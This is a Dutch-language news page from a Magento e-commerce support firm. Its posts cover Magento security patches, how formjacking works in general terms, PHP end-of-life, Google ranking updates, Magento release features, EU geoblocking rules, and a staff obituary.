Jira ICT wint MKB Beste Choice Award - Magento Workshops 2010
Banner

Magento nieuws

  • KRITIEKE UPDATES VOOR MAGENTO 1 EN 2

    Security-Blog-Magento-Patches 11Dinsdag 26 maart heeft Magento nieuwe updates voor Magento 1 en 2 uitgebracht, inclusief de gebruikelijke veiligheidsupdates. Voor Magento 1 gaat het om versie 1.9.4.1 en bij Magento 2 om versie 2.2.8 voor de 2.2 feature branch en 2.3.1 voor de 2.3 feature branch.

    Nu heeft Magento ondertussen een ritme dat er elk kwartaal updates inclusief beveiligingsverbeteringen uitgebracht worden, maar wij willen het belang van deze update extra benadrukken: Er wordt een belangrijke kwetsbaarheid voor SQL injection opgelost die zich in ALLE Magento versies bevindt.

    Wij raden iedere webshop eigenaar met klem aan zo snel mogelijk te updaten naar de nieuwste versie.


    Wat SQL injection precies inhoudt is een technisch verhaal (voor geinteresseerden: https://nl.wikipedia.org/wiki/SQL-injectie ), maar in gewone taal betekent het dat kwaadwillende toegang kunnen krijgen tot de volledige server en Magento installatie inclusief AL uw bedrijfs- en klantgegevens door via een link (URL) commando’s aan de Magento database door te geven. Een nachtmerrie voor uw bedrijf en haar reputatie en tegenwoordig ook met wettelijke consequenties onder de AVG. Omdat dit een grote kwetsbaarheid is, is er ook veel berichtgeving geweest in de media, waardoor ook veel mensen met kwade bedoelingen met deze informatie aan de slag kunnen.

    Daarnaast worden er voor Magento 2 ook nieuwe functionaliteiten geïntroduceerd, wat een upgrade extra interessant maakt. Zo wordt nu ook PHP 7.2 ondersteund voor Magento 2.2. Bovendien is dit het punt waarop wij klanten adviseren te upgraden naar de Magento 2.3 versie, nu de grootste bugs uit de nieuwe 2.3 versie opgelost zijn.

    Magento 2.3 biedt onder andere de volgende voordelen en nieuwe functies:

    • Page Builder is beschikbaar voor Commerce klanten. Hiermee wordt het maken van fraai vormgegeven pagina’s een peuleschil;
    • Inventory Management is beschikbaar voor zowel Open Source als Commerce, waarmee uw gemakkelijk uw inventaris beheerd, ook als die verspreid is over meerdere locaties;
    • PWA Studio en het Venia Storefront zijn beschikbaar om uw front-end naar een nieuw niveau te tillen.
    • Ondersteuning voor nieuwe technieken: ElasticSearch 6.0 en Redis 5.0 worden nu ondersteund, evenals PHP 7.2, waarmee de onderliggende software stack voor uw webshop weer bij de tijd is.

    Voor een volledig overzicht verwijzen wij naar de (engelstalige) release notes: https://devdocs.magento.com/guides/v2.3/release-notes/ReleaseNotes2.3.1OpenSource.html

  • Het verlies van een dierbare collega

    frank-sdMet grote verslagenheid hebben wij kennis genomen van het overlijden van onze zeer gewaardeerde collega en vriend, Frank Kooger.

    Op pensioenleeftijd kwam Frank bij ons in dienst. Hij vond zijn vak nog veel te leuk om er al mee te stoppen en wilde graag nog jaren blijven werken. En dat heeft hij gedaan!

    In die tijd hebben we Frank leren kennen als een zeer open, betrokken en sociaal persoon met liefde voor zijn vak. Hij was een goed collega en vriend, die altijd bereid was iedereen met raad en daad terzijde te staan, vaak tot in de late uurtjes. Elke dag kwam hij vol energie naar zijn werk, vergezeld door zijn hond, Teddy.

    Wij verliezen in Frank een zeer gewaardeerde en enthousiaste collega die zijn werk als DevOps-er met veel plezier en toewijding uitvoerde. Maar vooral verliezen wij een vriend.

    Toch heeft hij ons iets nagelaten waardoor hij altijd een beetje bij ons blijft. Frank heeft Teddy nagelaten bij een van onze collega’s waardoor er nu wekelijks een vrolijk hondje rondloopt door het kantoor.

    Wij wensen zijn familie veel sterkte met dit grote verlies, wetende dat hij nu rust heeft.

  • Magento kwetsbaarheid: Formjacking

    Magento Formjacking In 2018 zijn er duizenden webwinkels getroffen door formjacking. Criminelen hebben toen allerlei gevoelige informatie weten te stelen van klanten die online een bestelling plaatste.

    Bij formjacking wordt er kwaadaardige code toegevoegd aan de betaalpagina van een webwinkel. Deze code zorgt ervoor dat de ingevoerde gegevens van de klant, vaak gaat het om creditcard gegevens, dan worden teruggestuurd naar de criminelen.
    Het probleem is al even bekend, sinds 2016 blijkt het namelijk al een populaire methode. Het laatste jaar heeft er echter een doorbraak plaatsgevonden. Ook diverse grote webwinkels en bedrijven kregen hiermee te maken.

     


    Om de kwaadaardige code op de betaalpagina te krijgen maken criminelen onder andere gebruik van third-party code die op een webwinkel draait. Denk aan scripts die op websites draaien om live met klanten te communiceren, advertenties te plaatsen en klantbeoordelingen te verzamelen. Criminelen weten deze script nu aan te passen en voor hun te laten werken. In sommige gevallen wordt de webwinkel gehackt en met directe toegang tot de webwinkel kunnen criminelen ook kwaadaardige code toevoegen. Dit gebeurt vaak via Brute-force aanvallen of via andere bekende kwetsbaarheden van het Magento platform. Vaak betreffen het kwetsbaarheden waar al wel beveiligingsupdates voor zijn, maar die nog niet zijn doorgevoerd door de webwinkel.

    Ook is gebleken dat webwinkels die zijn getroffen door formjacking en dat hebben ontdekt, vaak snel opnieuw de dupe zijn. Zo worden er na de initiële hack overal backdoors en admin accounts toegevoegd en maken ze gebruik van database triggers en verborgen periodieke taken om de code weer opnieuw aan de pagina toe te voegen.

    Voor Magento webwinkels is het dus een security check te doen. Niet alleen naar formjacking scipts, maar ook naar eventuele backdoors, onbekende admin accounts en kwaadaardige code.

    Wij voeren dergelijke security audits dagelijks uit en helpen u hier graag bij. 

  • Google March 2019 core update

    google-algorithm-update-12-march-2019Op 13 maart heeft Google een nieuwe update doorgevoerd. Hoewel deze Google update oorspronkelijk de wereld in werd geholpen onder de naam Google Florida 2.0, noemde Google de update zelf de Google March 2019 Core update.

    De afgelopen maanden is er veel geroezemoes geweest over Google updates. Eerst de Google Medic update, welke een grote impact bleek te hebben op mobiele zoekresultaten van websites. De afgelopen weken over een eventuele nieuwe update, welke 13 maart werd dit bevestigd. En ja, het is waar dat Google elke dag, vaak zelfs meerder keren per dag, zijn algoritme bijwerkt. De meeste updates “finetunen” het algoritme en daar merk je weinig van. Deze update lijkt echter een aanzienlijke impact te hebben.


    Google bracht niet veel later het volgende bericht uit:

    “This week, we released a broad core algorithm update, as we do several times per year. Our guidance about such updates remains as we’ve covered before. Please see these tweets for more about that:https://t.co/uPlEdSLHoXhttps://t.co/tmfQkhdjPL”

    Het leek even dat Google hiermee de wereld voldoende had geïnformeerd, maar binnen de kortste keren lichtte de social media kanalen op met klachten over de update. Veel websites ondervonden hoge volatiliteit in hun rankings en dalingen in bezoekers.

    Google March 2019 Core update

    Ook opvallend was het aantal zoekwoorden waar websites hun ranking op verloren. Uit onderzoek is gebleken dat het merendeel van de geanalyseerde websites, op meer dan de helft van de zoekwoorden waarop ze gevonden willen worden in SERP (Search engine Results Page) zijn gedaald.

    Op dit moment weten we dus niet waar deze Google update zich op richt. Links, inhoud, snelheid, alles bij elkaar, iets compleet anders? Ook daar had Google het volgende over te melden:

    “There is nothing in particular to “fix,” and we don’t want content owners to mistakenly try to change things that aren’t issues.”
    Volgens Google betekent een brede core update dat er niet gericht wordt op niches of specifieke signalen, zoals kwaliteit en inhoud. Oftewel, Google richt zich dan niet op “iets” en biedt geen standaard oplossing voor pagina’s die minder goed presteren, behalve zorgen dat je een snelle website met goede content hebt natuurlijk.

    Hoewel de oplossingen even op zich liet wachten, was bij de vorige grote Google update, de Google Medic update, al snel duidelijk dat deze zich richtte op mobiele pagina’s. Daar waren SERP fluctuaties zichtbaar. Bij de Google March 2019 Core update zien we dit echter terug in desktop én mobiele resultaten.

    Waar deze Google update zich precies op richt, is dus nog geen peil op te trekken. Maar experts over de hele wereld zijn druk bezig de effecten te analyseren. We verwachten dan ook snel antwoord te kunnen geven op de impact die deze update heeft op Magento (2) webshops.

    Hoewel we voor deze update nu nog geen concrete antwoorden en oplossingen hebben, is er natuurlijk nog steeds genoeg wat je kunt doen om hoger in de Google ranking te komen. De juiste content, goede performance en een (mobiel) gebruiksvriendelijke website blijven 3 grote pijlers waar Google veel waarde aan hecht en je voor zal belonen. Het is daarom aan te raden periodiek in je shopt te duiken en dit up-to-date te houden.

    Een update over de Google March 2019 core update zal snel volgen.

  • Ook PHP 7.0 is end-of-life

    PHP LogoEr is het afgelopen jaar al veel geschreven over PHP versie 5, die na jaren van trouwe dienst in december 2018 toch echt op het einde van zijn leven aankwam: De software werd "end-of-life" verklaart en ontvangt sinds 31 december 2018 geen veiligheidsupdates meer. Veel website eigenaren zijn toen al aangeschreven door hun hosting partijen met het verzoek om op te waarderen naar een nieuwere versie.

    Minder in de schijnwerpers stond versie 7.0, die praktisch tegelijkertijd niet meer ondersteund werd. Sinds 10 januari 2019 worden ook voor deze software geen veiligheidsupdates meer uitgebracht.

    PHP is onderdeel van de zogeheten web stack op de servers waar uw Magento shop op draait. Je kan dit zien als de fundering van je winkel. En hoe goed je Magento installatie ook beveiligd is, als de onderliggende PHP versie niet up-to-date is dan is dat de zwakste schakel, waar hackers en andere kwaadwillenden gretig gebruik van maken. Je kan het vergelijken met drie sloten op je voordeur hebben en de achterdeur open laten staan.

    SupportDesk adviseert dan ook met klem om je hosting zo snel mogelijk op te waarderen naar PHP 7.1 of 7.2 (afhankelijk van je Magento versie). Uiteraard zult u hiervoor na moeten gaan of alle software, zowel Magento zelf als modules en koppelingen naar externe diensten, hiervoor geschikt is.

    Hier hebben wij in het verleden al uitgebreid over geschreven, bijvoorbeeld over het verschil tussen PHP 5.6 en 7.x ( https://www.supportdesk.nu/blog/261-php-5-6-of-php-7-overstappen-naar-een-nieuwere-php-versie ) en de support voor PHP 7.2 in Magento 1 (https://www.supportdesk.nu/blog/274-php-7-2-support-patches-voor-magento-1 en https://www.supportdesk.nu/blog/277-magento-open-source-1-9-4-0-release) .

    Uiteraard staat SupportDesk voor je klaar als je hulp nodig hebt bij deze upgrade. Na een korte Readiness scan https://www.supportdesk.shop/php7-readiness-scan-voor-magento-shops geven we je een uitgebreid advies hoe jij upgrade naar PHP 7.1 of 7.2 .

     

  • Onderzoek: Impact Google Medic update op E-commerce platforms

    google medic update 250xEind juli kwam Google met een nieuwe Pagespeed algoritme update. Een update die, door de impact die het had op medische sites, al snel de naam Google Medic heeft gekregen. Snel bleek dat de update echter ook een grote impact had op de e-commerce branche. 100 webshops, draaiend op Magento 1, Magento 2, Shopware, PWA, Lightspeed en WooCommerce, ondervonden allemaal grote dalingen in mobiele pagespeed scores. Maar wat kun je hier tegen doen?

     

    Het bijgewerkte Pagespeed algoritme geniet een grote voorkeur voor snelle, mobiel-geoptimaliseerde websites. Tot juli behandelde Google snelle mobiele sites als aanbeveling, maar na de update is dit een keiharde ranking factor in het algoritme geworden voor mobiele zoekresultaten. Lees meer over de Google Medic update in deze blog.

    Het effect: Bij veel webshops daalden de Mobiele Pagespeed scores dramatisch, van 85 naar 10 (en soms lager). Resulterend in grote dalingen in de organische zoekresultaten, van pagina 1 naar pagina 4 en webshops die Google Ads gebruiken werden nog eens extra gestraft. De CPC (Cost-Per-Click) zijn bij veel websites gestegen met 25% (en meer) vanwege de lagere scores van Google Pagespeed voor mobiel.

    Het onderzoek: Wat moet je doen voor een hogere mobiele Pagespeed score?

    Dat de Google Pagespeed update de e-commerce branche heeft getroffen is een feit. Maar wat moeten webshops doen om de Pagespeed score van hun mobiele site weer in het groen te krijgen? Om een goed beeld te krijgen van de impact hebben we eerst in kaart gebracht op welke platforms de update effect heeft gehad.

    Welke e-commerce platforms zijn getroffen?

    Verdeeld over de platformen Magento 1, Magento 2, Shopware, WooCommerce, PWA en Lightspeed, hebben we 100 webshops onder de loep genomen en gekeken naar de mobiele Pagespeed scores. Per webshop zijn er 4 pagina’s gemeten; de homepage, Categorypage, productpage en de checkout. Hieronder de resultaten van de gemiddelde scores per website, per platform:

    Impact Google Medic update on Magento and other platforms
    De resultaten laten zien dat de Google Medic update effect heeft op alle platforms. Bij elk platform is de helft of meer in het rood gevallen en scoren maar twee shops volgens de norm. Met alle resultaten in het rood en een gemiddelde score van 21,1 lijden de webshop die draaien op Magento 2 het meest onder de update. Als de verhoudingen hetzelfde blijven, met 96% buiten het ‘veilige’ groen (waarvan 60% in het rood), zullen tienduizenden webshops de negatieve gevolgen voelen.

    Wat moet ik doen om mijn mobile Pagespeed score omhoog te krikken?

    Momenteel zijn we met de betreffende platforms en verschillende experts in gesprek en voeren we al diverse testen uit op Magento 1 en Magento 2. We hopen zo snel mogelijk met een update te komen die per platform antwoord geeft op de te volgen best practice methodes voor een hoge mobile Pagespeed score.

    Update:

    Er zijn verschillende technieken en tools die je kunnen helpen deze problemen te bestrijden. Momenteel zitten we nog midden in het onderzoek naar een lijst met best practices, maar we willen je toch alvast tussentijdse update geven over onze bevindingen.

    De focus ligt op snelheid

    Het zit ‘m natuurlijk al in de naam, “pagespeed”, dus het is geen verrassing dat de snelheid van mobiele sites een grote factor speelt bij het bepalen van de score. Hoewel het in veel landen misschien niet het geval is, is Google van mening dat de meeste mobiele gebruikers een 3G verbinding hebben. Dit betekent dat de scores gebaseerd zijn op de snelheidservaring van iemand die met winkelt met een 3G verbinding. En dat is een aanzienlijk verschil met 4G.

    3G en 4G internet

    3G internet is de derde generatie mobiel internet. 3G internet is in heel Nederland beschikbaar en bij sommige providers is 3G het standaard type mobiel internet. De gemiddelde snelheid van 3G internet is 7 Mbps en heeft maximale snelheid van 14,4 Mbps. Met deze snelheid laad je binnen een seconde een nieuwsbericht van ongeveer 1 MB.
    4G internet is de vierde generatie mobiel internet en de opvolger van 3G. De gemiddelde snelheid van 4G internet is 20 Mbps en heeft een topsnelheid van 150 Mbps. Een heel stuk sneller dus dan 3G.

    Waar gaat het fout bij Magento shops?

    Vooral wanneer iemand met een 3G verbinding een pagina bezoekt heeft elke MB, javascript, css en berekening een grote invloed op hoe snel je pagina laadt. We hebben diverse Magento 1 en Magento 2 webshops door Pagespeed gehaald en zagen dat Magento shops worden afgestraft op de volgende punten:

    • 1. Assets
      • Afbeeldingen hebben geen moderne indeling.
      • Afbeeldingen worden niet op een efficiënte manier gecodeerd.
      • Afbeeldingen hebben niet het juiste formaat .
      • Afbeeldingen worden geladen die nog niet in beeld zijn.
      • Afbeeldingen, Javascript, css files worden niet gecomprimeerd.
    • 2. Javascript en css
      • Javascript worden niet correct ingeladen.
      • Er worden veel onnodige Javascript en css files gebruikt.
    • 3. Time To First Byte is te hoog

    Er kunnen uiteraard een tal van andere redenen zijn waarom Pagespeed jouw webshop een lage score geeft (dit kun je makkelijk checken door je shop door Pagespeed te laten analyseren). De bovenstaande lijst is, naar onze mening, de lijst met de meest voorkomende grote boosdoeners.

    Wat kunnen we hiertegen doen?

    Afbeeldingen
    voor een moderne indeling, efficiënte codering en juist formaat van je afbeeldingen kun je onder andere gebruik maken van tools als Pagespeed of de Hypernode Image Optimizer van Byte.

    PageSpeed is een extensie die je op de server moet installeren. De module houdt rekening met hetgeen waarop Google PageSpeed op test. Echter er komen aardig wat NGINX aanpassing bij kijken en niet alle hostingpartijen ondersteunen dit.

    Module Rocket javascript 0-25 punten

    De meeste Javascripts worden tussen de ‘head’ en de ‘body’ ingeladen. Indien er op de website veel gebruikt wordt gemaakt van Javascript of de code heel uitgebreid is, kan de laadtijd van je site hieronder lijden. Met behulp van deze module wordt de javascript naar de footer verplaatst waardoor de laadtijd van de pagina omlaag gaat.

    Onnodige Javascripts en CSS files verwijderen: 1-20 punten

    Bij veel Magento shops worden talloze Javascripts en CSS files ingeladen die helemaal niet worden gebruikt. Als je ergens veel tijdswinst mee kunt pakken, is dat wel door tientallen onnodige scripts uit je front-end te verwijderen.

    Css en js minify aan: 1-20 punten

    Minify is het proces waarbij onnodige spaties of tekens uit de code worden verwijderd. Deze spaties en tekens zijn niet nodig om de code uit te voeren en dus alleen de grootte aan het bestand toe te voegen. Wanneer ze worden verwijderd, worden de bestanden lichter, wat op zijn beurt de laadtijd verlaagt

    Varnish

    Varnish is een reverse proxy, ook wel web accelerator genoemd. Deze draait op de server waar in een normale configuratie de webserver actief is. Varnish is eigenlijk een slim doorgeefluik. Als Varnish juist geconfigureerd is, zal het bepaalde gedeeltes van de site (die voor alle bezoekers hetzelfde zijn) de eerste keer dat ze worden opgevraagd bewaren. Zo hoeft de webserver een groot gedeelte niet elke keer opnieuw berekenen, en dat scheelt een hoop tijd en kan je shop een stuk sneller maken. In Magento heb je als optie de Built-in Cache of Varnish, maar Varnish geniet bij bij de meeste de voorkeur.

    Time to first Byte (TTFB)

    De Time to First Byte (TTFB) geeft de tijd aan die het duurt voordat de gebruiker van een website het eerste response packet krijgt vanuit de server. Een snelle Time to First Byte is belangrijk voor de snelheid van jouw website en weegt daarom ook zwaar mee binnen Google Pagespeed. Wanneer je Time to first byte traag is ligt dit vaak aan een overvolle opslagruimte, slecht in elkaar gezette servers of trage database aanvragen. Let op de volgende punten voor een snelle TTFB:

    • Gebruik de meest recente PHP-versie met FPM. PHP 7 is namelijk een stuk sneller dan PHP 5.
    • Webhosting. Zorg voor een snelle en sterke server.
    • Zorg dat je een correct geconfigureerde MySQL server
    • Redis (of een alternatief) voor caching.
  • Impact Google Medic update

    google medic update 250xGoogle is continu bezig hun zoekalgoritmes te updaten. Jaarlijks voert de zoekgigant 500 tot 600 updates door, maar van de meeste updates zal je nauwelijks iets merken. Het betreffen vaak kleine updates die incrementele verbeteringen doorvoeren. Soms rolt Google echter ook een ‘grote’ update uit en hier kun je de effecten wel van merken, zoals de Google Panda update. De Panda update is voor het eerst uitgerold in 2011 en was erop gericht lage kwaliteit content te herkennen. Needless to say, vanaf toen zagen websites met ‘lage kwaliteit content’ hun Google ranking zakken. Op 31 juli heeft Google weer een ‘grote’ update uitgerold, de Google Medic Update, en hier waren de effecten van te merken….

    Wat is er gebeurd

    Op 31 juli waren de eerste schommelingen waar te nemen in de ranking posities, maar niemand had iets gehoord van een update. 1 dag later bevestigde Google dat ze inderdaad een grote ‘broad core algorithm update’ hadden uitgevoerd. De impact hiervan is goed te zien in seo/marketing tools. Onderstaande grafiek laat de SERP volatility zien. SERP staat voor ‘Search Engine Results Page, ofwel de Google pagina waar jouw website op gevonden wordt. Volatiliteit betekent bewegelijkheid, en in dit geval de bewegingen waarmee jouw website door de Google pagina’s beweegt.

    SERP-volatility-768x432

     

    Google medic update

    Google medic heeft zijn naam te danken aan de impact die het heeft gehad op medische websites. Uit onderzoek is echter gebleken dat de update zich richtte op een iets bredere groep, namelijk op Your Money or Your Life (YMYL) websites. Google omschrijft dit als websites die geluk, gezondheid of rijkdom kunnen beïnvloeden. Hier vielen dus de medische websites onder, maar ook juridische pagina’s, financiële pagina’s én shopping websites. Hieronder een grafiek van websites, verdeeld over de branches die impact hebben ondervonden:

    Het komt weinig voor dat een update zich zo sterk concentreert op een niche, wat ook tot de naam Google Medic Update heeft geleid. Het diagram laat echter ook zien dat de update zich niet alléén richt op de mediche branche, maar ook invloed heeft op tal van andere branches.

    Pie-chart-Google-Medic-Update

    Impact Google Medic Update op E-commerce shops

    Aan het diagram is af te lezen dat ook de E-commerce business een flinke klap heeft gekregen van de update. Om deze reden zijn wij dan ook een onderzoek gestart naar de impact van de Google Medic Update op verschillende E-commerce platformen, zoals Magento 1, Magento 2, Lightspeed, WooCommerce, Shopware en PWA. Wat blijkt is dat de scores voor de mobiele pagina’s van de platformen drastisch zijn gedaald. Een impact wat op termijn een groot effect kan hebben op de ranking van websites. De resultaten van het onderzoek zullen in een ander artikel worden besproken.

    Wat zegt Google

    Google heeft nog geen details vrijgeven over de update en ook geen specifieke antwoorden gegeven op de vele vragen van marketingexperts. Enkel één advies kwam van Google “websites moeten waardevolle content voor gebruikers creëren”. Door deze uitspraak wordt er nu gespeculeerd dat Google verhoogde eisen heeft gesteld aan pagina’s. Zo zou een pagina gemaakt moeten worden door een expert (techniek), veel autoriteit moeten hebben (content) en vertrouwd moeten zijn (veilig). Punten waar de meeste webshops sowieso al naar kijken, maar Google is misschien nu nóg kritischer. Het blijft echter giswerk tot Google komt met een bevestiging.  

    Ons advies

    Naast content, techniek en vertrouwdheid, spelen mobiel vriendelijke pagina’s ook een grote factor. Met name de laadsnelheid en gebruiksvriendelijkheid voor mobiele gebruikers worden nu zwaarder gewogen in het google algoritme. Meer informatie over waarom Google dit nu zwaarder weegt  kun je vinden in onze blog over Google Mobile first indexing. Ons advies; kijk weer eens goed naar je content, zorg dat je website weer up to date is (techniek, crawlfouten, broken url’s) en kijk eens hoe goed je mobiele shop presteert. Dit kun je onder andere doen door de Mobile Friendly test van google te raadplegen.   

     

     

  • Magento 2.3.0 is live! Wat zijn de nieuwe features?

    Magento 2.3.0Op 28 November heeft Magento zijn langverwachte update, Magento 2.3.0, voor Open Source en Commerce uitgebracht. Zoals in elke update brengt ook deze versie weer vele nieuwe features met zich mee waar webshopeigenaren hun webwinkel mee kunnen verrijken.

    Met deze nieuwe versie zijn webwinkeliers beter in staat voorraden op verschillende locaties te beheren, PWA mobiele webshops te maken, makkelijker pagina’s aan te maken met een handig drag-and-drop systeem en betere performance te realiseren. Verder zijn er vele updates en verbeteringen doorgevoerd.


    Magento 2.3.0 Multi-Source Inventory (MSI)

    De Multi-Source Inventory biedt de mogelijkheid producten en voorraden toe te wijzen aan elke beschikbare fulfilmentpartner en te inventariseren. Hiermee kan men dus vanuit de Magento admin veel efficiënter voorraden beheren die op verschillende fysieke locaties staan.

    Magento 2.3 Multi source Inventory Admin view

    Magento 2.3 PWA studio

    PWA staat voor Progressive Web Apps, een techniek die zijn naam van Google heeft gekregen. Google vindt dat een website, ongeacht via welk apparaat deze wordt bezocht deze, Snel, betrouwbaar en gebruiksvriendelijk met zijn. Met PWA moeten webwinkels dit voor hun klanten kunnen realiseren.

    Hoor je iets over PWA, dan gaat dat vaak gepaard met Magento. Magento is namelijk al een tijd bezig PWA te integreren in het platform en kondigde enige tijd geleden aan dit te willen realiseren met Magento 2.3. Met Magento PWA Studio hebben ze de daad bij het woord gevoegd. Met Magento PWA studio, dat ook beschikbaar is in Magento Open Source, krijgen aangesloten webshops de mogelijkheid om snel en goedkoop ‘app achtige’ achtige content leveren dat geïntegreerd en betrouwbaar is.

    Magento 23 PWA Studio

    Magento 2.3 Page Builder

    Voor Magento Commerce lanceert Magento met Page Builder ook een nieuwe drag-and-drop interface. Met Page Builder wil Magento front-end aanpassingen, zoals het creëren van nieuwe pagina’s, verrijken van producten & categorieën en het lanceren van nieuwe content sneller en makkelijker maken. Op dit moment is Page Builder alleen nog beschikbaar in het Early Adopter Program, maar bij de update naar 2.3.1 wordt de dienst voor iedereen beschikbaar.

    Magento 23 Drag Drop

    Magento 2.3 extra updates

    Naast de bovengenoemde nieuwe functies die bij deze versie zijn inbegrepen, biedt Magento 2.3 ook de volgende updates en verbeteringen:

    • Magento Shipping
      • Extra ondersteuning voor nieuwe Fulfillment opties en uitgebreide wereldwijde beschikbaarheid.
    • GraphQL
      • Een flexibele storefront API die is geïntergeerd in het Magento API-systeem. Ontwikkelaars kunnen in één enkel verzoek gemakkelijker specifieke gegevenselementen uit API's opvragen. GraphQL zorgt voor snellere en voorspelbaardere presentatieresultaten, zelfs op langzame netwerken.
    • Asynchronous & Bul Web API’s
      • nieuwe schaalbare API's zorgen voor betere controle over de timing en uitvoeringszichtbaarheid van API-aanroepen, op groter volume en zonder te wachten tot alle voorgaande bewerkingen zijn voltooid.
    • Declarative schema
      • Vergemakkelijkt het upgrade- en installatieproces door ontwikkelaars toe te staan de uiteindelijke gewenste status van de database aan te geven en het systeem automatisch aan te passen, zonder overbodige bewerkingen uit te voeren.
    • Verbeterde indexeringsprestaties
      • Gedeelde en parallelle verwerking van indexeerders verlaagt de indexatietijd met meer dan 60%, om zo de grotere webshops en snellere productupdates te ondersteunen.
    • Nieuwe security tools
      • Je kunt je webshop nu nóg beter beveiligen met behulp van Google ReCAPTCHA en Two Factor Authentication.

    Magento 2.3.0 heeft tal van nieuwe features en verbeteringen. Wil je upgraden naar Magento 2.3 of meer vragen over deze versie? Neem dan contact met ons op.

  • Magento Open Source 1.9.4.0 release

    magento upgradeOp 28 november 2018 heeft Magento een nieuwe release uitgebracht voor Magento Open Source (OS), Magento 1.9.4.0. Deze update biedt oplossingen tegen meerdere beveiligingsproblemen, zoals Remote code execution (RCE), cross-site scripting (XSS) en Cross-site request forgery (CSRF). Ook heeft deze release 15 verbeteringen doorgevoerd, waaronder ondersteuning voor PHP 7.2

    Verholpen problemen en verbeteringen

    • This release provides support for PHP 7.2.
    • We’ve removed the CC module. As a result, third-party modules that depend upon either the ccsave method or the xmlconnect method will not work as expected. Third-party themes that implement ccsave will not work as expected, either.
    • The Magento logo has been updated throughout the code base.
    • The Continue button now works as expected on the Payments step of checkout when paying with the PayPal payment method.
    • Google Tag Manager now logs sales information in Google Analytics as expected.
    • The product export CSV file now contains columns for super attributes.
    • Magento no longer throws an error when a customer accesses their shopping cart after items in their cart have been removed due to a timeout. Previously, Magento displayed this error, `Notice: Undefined variable: freePackageValue in /var/www/dev/htdocs/app/code/core/Mage/Shipping/Model/Carrier/Tablerate.php on line 130`.
    • Clicking on a configurable product’s swatch on the product list page now updates product price as expected.
    • Customers can now successfully add a grouped product to their shopping cart when category permissions are enabled. Previously, Magento did not add the product to the cart, but instead displayed a descriptive error message.
    • Magento no longer displays incorrect prices on the storefront after a failure of the enterprise refresh index.
    • We’ve resolved issues in the indexing locking mechanism that previously resulted in Magento throwing an exception after indexing completed.
    • Magento no longer throws a fatal error when a merchant uses an already reserved word to name a product attribute.
    • Magento now adds the correct sales tax to orders being shipped to U.S. addresses that use zip codes with the optional four-digit suffix (for example, 73365-1234). Previously, the Tax rule triggered a failure if the U.S. zip code that had this optional four-digit suffix.
    • Magento now displays all products on a production website that were edited by a role-restricted user on the associated staging website.
    • We’ve resolved an issue that caused Target Rules to throw an exception when a customer opened a product view page.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten altijd aan zo spoedig mogelijk te pachten of te upgraden. Wij doet dit graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

  • Magento 2.2.7 voor Open Source (OS) en Commerce

    magento upgradeOp 28 november heeft Magento de nieuwste versie van Magento 2.2 Open Source (OS) en Commerce vrijgegeven. Magent0 2.2.7. Deze upgrade biedt meer dan 30 beveiligingsupdates, 150 Magento core code verbeteringen en 350 pull requests, ingediend door de Magento Community.


    Magento 2.2.7 Open Source (OS) en Commerce Highlights

    Algemene verbeteringen

    • Wanneer een klant een product aan zijn winkelwagen toevoegt, worden alle relevante attributen nu ingevuld in Google Tag Manager. Eerder ontbraken gegroepeerde, bundel- en configureerbare productkenmerken in Google Tag Manager.

    Magento Wishlist

    • Klanten kunnen nu vanuit de winkelwagen kiezen op welke verlanglijst ze een product willen toevoegen.
    • Producten die uitgeschakeld zijn in de Magento Admin verschijnen niet meer in de verlanglijsten. Voorheen verschenen deze producten nog wel op de verlanglijst. Wanneer er toen op het product werd geklikt, stuurde Magento de klant naar een “page not found”.
    • Magento toont nu een “succesvol bijgewerkt” bericht nadat de klant zijn verlanglijst heeft bijgewerkt.
    • Magento geeft nu de juiste opties weer wanneer u op ‘Details bekijken’ klikt van een product met configureerbare opties.

    Magento Shipping

    • De Magento UPS module is bijgewerkt en ondersteunt nu de nieuwe UPS API-endpoints

    Magento Fuctional Test Framework (MFTF)

    • MFTF-versie 2.3.8 zit nu in Magento 2.2.7

    Het volledig overzicht van alle Magento 2.2.7 verbeteringen kunt u vinden in de officiële Magento release notes van Magento 2.2.7 Open Source en Magento 2.2.7 Commerce.

    Wat moet ik doen om Magento Security Issues te bestrijden?

    Wij raden onze klanten altijd aan zo spoedig mogelijk te pachten of te upgraden. Zo maakt u altijd gebruik van de meest actuele beveiligingsmaatregelen (patch) en de nieuwste features en verbeteringen (upgrade). Wilt u patchen of upgraden? Wij helpen u hier graag mee. Mail ons via ons supportaanvraagformulier of bel via 020 337 59 61

  • Geoblocking: wat betekent dit voor webshop(per)s?

    geoblockingNa het definitieve akkoord op de verordening inzake geoblocking in november 2017, heeft de Raad dit op februari 2018 officieel goedgekeurd. Iets meer dan 9 maanden later (3 december 2018) is de verordening van kracht. Wat betekent dit voor webshop(per)s?


    Geoblocking is het verhinderen dat klanten toegang hebben tot (de aankoop van) producten of diensten op een website in een andere lidstaat of hen daarbij discrimineren. Bijvoorbeeld door het weigeren van registratie, aankopen en betalingen van een klant omdat hij vanuit een andere lidstaat besteld. Meer dan de helft van de webwinkels doet aan geoblocking, blijkt uit onderzoek van de Europese commissie.

    Shoppen wordt makkelijker, goedkoper en sneller

    Dit betekent dat vanaf 3 december 2018 alle Europeanen in alle Europese webshops producten en diensten moeten kunnen bestellen, zonder tegen een blokkade aan te surfen. Voor klanten uit andere lidstaten gelden dus dezelfde voorwaarden als voor klanten uit eigen land.
    Voor Europeanen wordt shoppen binnen Europa makkelijker, goedkoper en sneller. Makkelijker omdat men niet meer tegen blokkades aan surft. Goedkoper omdat sommige producten goedkoper zijn in het buitenland. Zo zijn in Duitsland veel cosmetische producten een stuk goedkoper dan in Nederland. Ook kunnen in andere landen producten eerder verkrijgbaar zijn.

    Wat betekent dit voor (Magento) webshops?

    Webshops moeten hun producten en diensten aanbieden aan alle Europeanen zonder enige vorm van geo-blokkades. Zo mag een organisaties die per land een aparte website heeft, bijvoorbeeld een Franse klant niet automatisch doorverwijzen naar de Franse website waar het product misschien wel duurder is. Daar is toestemming van de klant voor nodig.
    Nu betekent dit overigens niet dat webwinkels gedwongen zijn hun ondernemersgebied uit te breiden. Een Nederlandse webshop moet nu niet ineens ook in Portugal gaan leveren. Het moet voor de Portugees alleen mogelijk zijn om op de Nederlandse webshop te bestellen. Voor de verzending kun je de klant voorstellen het pakketje te komen ophalen, transport zelf te laten regelen of het product bij het dichtstbijzijnde postkantoor (binnen het gebied waar jij levert) te laten afleveren. Wil je iets in het buitenland bestellen, dan kan het zijn dat je het transport dus zelf moet regelen.

